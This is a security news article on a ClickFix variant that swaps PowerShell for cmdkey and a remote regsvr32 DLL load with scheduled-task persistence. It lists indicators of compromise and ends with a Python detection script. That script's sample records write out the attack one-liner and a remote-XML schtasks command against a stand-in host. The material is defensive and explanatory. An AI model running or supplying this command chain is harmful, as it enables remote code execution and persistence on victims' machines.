ClickFix Attack Replaces PowerShell with Cmdkey and Remote Regsvr32

Jennifer Sherman
April 27, 2026

Key Takeaways

  • A new variant of the ClickFix attack chain has emerged, abandoning PowerShell in favor of native Windows tools.
  • The attack leverages cmdkey and regsvr32 to silently deliver and execute a remote payload without dropping files to disk.
  • Discovered by CyberProof, this technique employs social engineering with fake CAPTCHA pages to trick users into executing a multi-stage command.
  • The attack establishes persistence by creating a scheduled task that retrieves its definition from a remote XML file, making it stealthy and adaptable.
  • Organizations should enhance monitoring for suspicious activity involving these legitimate Windows utilities and reinforce user education against social engineering tactics.

ClickFix Evolves: PowerShell Replaced by Native Windows Tools for Stealthy Payload Delivery

A sophisticated evolution of the ClickFix attack, dubbed “ClickFix v2” by researchers, has been observed in the wild. This latest iteration marks a significant strategic shift, moving away from PowerShell to exploit a chain of legitimate Windows utilities for payload delivery and execution. The new technique allows attackers to silently infiltrate systems without leaving traditional forensic traces on disk, posing a substantial challenge to conventional detection mechanisms.

ClickFix campaigns have historically relied on social engineering to coerce users into running malicious commands. Earlier versions typically involved victims pasting commands, often obtained from deceptive CAPTCHA pages, into the Windows Run dialog. These commands would then invoke PowerShell to download and execute a malicious payload. The efficacy of this method has made ClickFix a persistent concern for cybersecurity professionals.

The CyberProof Threat Research Team, comprising Deepak Nayak, Kithu Shajil, and Veena Sagar, identified this novel ClickFix variant. Their findings, published on April 22, 2026, highlight the complete abandonment of PowerShell in this updated attack. This change significantly hinders detection by security tools configured to flag PowerShell-based malicious activity.

CyberProof’s researchers noted that the updated campaign employs a concise command chain. This chain meticulously stores credentials, retrieves a remote Dynamic Link Library (DLL), and executes it stealthily using trusted Windows components. By “living off the land” and exclusively utilizing built-in Windows tools (LOLBins), attackers can seamlessly blend their malicious operations with normal system behavior, thereby making detection considerably more complex.

This strategic pivot has profound implications for organizations relying heavily on behavioral detection. Traditional security solutions designed to detect suspicious file drops or unusual process executions might fail to trigger alerts, as the attack leverages only legitimate system binaries. A single, socially engineered command executed through the Windows Run dialog is sufficient to initiate a multi-stage attack chain, establish persistence on the compromised machine, and connect back to attacker-controlled infrastructure. This low barrier to entry makes the threat accessible to a broad spectrum of potential victims, from individual users to corporate entities.

The campaign’s effectiveness is amplified by the minimal user interaction required for infection: a simple paste and execution of a pre-loaded command. The attackers meticulously craft the initial phishing pages, often impersonating legitimate Cloudflare CAPTCHA screens, to build trust and encourage victims to perform the malicious action.

Inside the Infection Mechanism

The attack sequence begins when a user navigates to a phishing page disguised as a CAPTCHA verification prompt. The page instructs the victim to open the Windows Run dialog (Win + R), paste a provided command, and press Enter. The observed command initiates cmd.exe and orchestrates two primary actions.

Attack Chain Summary (Source – CyberProof)

First, the cmdkey utility is used to store credentials for the remote IP address 151.245.195[.]142 under the username “guest.” Immediately following, regsvr32 is invoked to silently load a DLL, specifically “demo.dll,” from the attacker’s Server Message Block (SMB) share via a Universal Naming Convention (UNC) path. A “REM” comment embedded within the command, stating “I am not a robot,” further attempts to mask the malicious intent, portraying it as a genuine verification step.

Establishing Persistence and Executing the Second-Stage Payload (Source – CyberProof)

Upon execution of the remote DLL by regsvr32, its DllRegisterServer export triggers a hidden CreateProcessA call. This call establishes a scheduled task named “RunNotepadNow” using the Windows Task Scheduler. Crucially, the task definition itself is not stored locally on the infected machine but is dynamically retrieved from a remote XML file hosted on the attacker’s server. This method allows the attackers to modify their second-stage payload at any time without needing to redeploy the initial DLL, providing long-term persistence with minimal on-host forensic artifacts.

Malicious Command Execution via Run Dialog (Source – CyberProof)

To counter this advanced threat, security teams must implement enhanced monitoring strategies. This includes vigilance over cmdkey usage, particularly when associated with external IP addresses, and careful scrutiny of regsvr32 processes loading remote DLLs via UNC paths. Robust alerting should be configured for chained command execution originating from cmd.exe, and any Task Scheduler activity referencing remote XML files warrants immediate and thorough review. Network-level restrictions or stringent monitoring of outbound SMB and UNC access are also critical. Furthermore, continuous user education remains paramount to equip employees with the ability to recognize and avoid ClickFix-style social engineering attempts before they inadvertently execute malicious commands.

Indicators of Compromise (IOCs):

  • 151[.]245.195.142
  • \\151[.]245.195.142\hi\demo.dll
  • \\151[.]245.195.142\hi\777.xml
  • SHA256: b2d9a99de44a7cd8faf396d0482268369d14a315edaf18a36fa273ffd5500108

What You Should Do

  • Enhance Endpoint Detection and Response (EDR) Rules: Configure EDR systems to detect unusual execution patterns involving cmdkey and regsvr32, especially when they interact with remote IP addresses or UNC paths.
  • Monitor for Chained Command Execution: Implement alerts for instances where cmd.exe is used to chain multiple commands, particularly those involving credential storage or remote file loading.
  • Restrict Outbound SMB/UNC Traffic: Limit or strictly monitor outbound SMB and UNC access from endpoints to external IP addresses to prevent remote payload retrieval.
  • Review Scheduled Task Creation: Scrutinize any new scheduled tasks, particularly those that retrieve their definitions or executables from remote XML files or network shares.
  • Conduct Regular Security Awareness Training: Educate users about social engineering tactics, specifically those mimicking CAPTCHA pages, and emphasize the dangers of pasting or executing commands from untrusted sources.
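The following Python is an added example, not code from the article or from CyberProof, that turns the monitoring guidance in the paragraph closing "Inside the Infection Mechanism" and the bullets above into detection rules run over constructed process-creation records shaped like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine). Everything in the sample records is made up for this example: the addresses come from the RFC 5737 documentation range (203.0.113.0/24), the share and file names are placeholders, and none of the article's IOCs appear. The example also assumes the second-stage task is imported with `schtasks /Create /XML <path>`, which the article does not state; the internal ranges are RFC 1918 plus loopback and link-local and would be replaced with an organisation's own prefixes.

```python
"""Detection rules for the cmdkey -> regsvr32 (UNC DLL) -> scheduled-task chain.

Records are dictionaries with Sysmon Event ID 1 style fields. The rules are
deliberately independent so each one can be tuned or suppressed on its own;
the interesting signal is several of them firing on related events.
"""
import ipaddress
import re
from typing import Dict, List

Event = Dict[str, str]

# Assumption: ranges treated as "internal". A real deployment lists its own prefixes.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]

# \\host\share\file  -> captures "host"
UNC_HOST_RE = re.compile(r"\\\\([^\\\s'\"]+)\\")
# cmdkey /add:<target> or /generic:<target>
CMDKEY_TARGET_RE = re.compile(r"\bcmdkey(?:\.exe)?\b.*?/(?:add|generic):(\S+)", re.IGNORECASE)
# schtasks ... /XML <path>
SCHTASKS_XML_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/xml\s+(\S+)", re.IGNORECASE)
# The three LOLBins named in the article
LOLBIN_RE = re.compile(r"\b(cmdkey|regsvr32|schtasks)(?:\.exe)?\b", re.IGNORECASE)


def is_external_host(host: str) -> bool:
    """True for an IP outside INTERNAL_NETWORKS; dotted DNS names are treated as
    external and single-label names (e.g. FILESRV01) as intranet (assumption)."""
    host = host.strip("'\"").rstrip(".")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." in host
    return not any(ip in net for net in INTERNAL_NETWORKS)


def remote_unc_hosts(cmdline: str) -> List[str]:
    """Hosts referenced by UNC paths in a command line that resolve as external."""
    return [h for h in UNC_HOST_RE.findall(cmdline) if is_external_host(h)]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: Event) -> List[str]:
    """Return the names of every rule the event satisfies, in a fixed order."""
    cmd = event.get("CommandLine", "")
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    hits: List[str] = []

    m = CMDKEY_TARGET_RE.search(cmd)
    if m and is_external_host(m.group(1)):
        hits.append("cmdkey_external_target")

    if re.search(r"\bregsvr32(?:\.exe)?\b", cmd, re.IGNORECASE) and remote_unc_hosts(cmd):
        hits.append("regsvr32_remote_unc_dll")

    m = SCHTASKS_XML_RE.search(cmd)
    if m and remote_unc_hosts(m.group(1)):
        hits.append("schtasks_remote_xml_definition")

    # The article describes the DLL's DllRegisterServer spawning the task-creation
    # process, so a schtasks child of regsvr32 is suspicious on its own.
    if image == "schtasks.exe" and parent == "regsvr32.exe":
        hits.append("schtasks_spawned_by_regsvr32")

    # One cmd.exe line chaining two or more of the LOLBins: the Run-dialog one-liner shape.
    if image == "cmd.exe" and "&" in cmd and len({n.lower() for n in LOLBIN_RE.findall(cmd)}) >= 2:
        hits.append("cmd_chained_lolbins")
        if parent == "explorer.exe":  # Run dialog commands are started by explorer.exe
            hits.append("launched_from_run_dialog_context")

    return hits


def triage(events: List[Event]) -> Dict[int, List[str]]:
    """Map index -> fired rules for every event that fires at least one rule."""
    return {i: hits for i, hits in ((i, detect(e)) for i, e in enumerate(events)) if hits}


# Constructed sample records (not from the article). Two mimic the described chain
# with placeholder values; three are benign uses of the same utilities.
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c cmdkey /add:203.0.113.10 /user:guest /pass:x & "
                    r"regsvr32 /s \\203.0.113.10\share\stage.dll & REM I am not a robot"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"schtasks /Create /TN RunNotepadNow /XML \\203.0.113.10\share\task.xml /F"},
    {"Image": r"C:\Windows\System32\cmdkey.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmdkey /add:10.20.30.40 /user:CORP\svc_backup /pass:*"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\component.dll"'},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /Create /TN Backup /XML C:\ops\backup.xml"},
]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(hits)}")
```

Run stand-alone, only the first two sample records fire (four rules on the pasted one-liner, two on the task-creation child); the internal cmdkey, local regsvr32 and local-XML schtasks records stay silent. `cmdkey_external_target` alone will be noisy anywhere users save credentials for cloud file shares, so in practice it is the co-occurrence with `regsvr32_remote_unc_dll` or `schtasks_remote_xml_definition` on the same host that should page an analyst; the network-level control from the bullets above (blocking outbound SMB) removes the whole class rather than detecting it.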
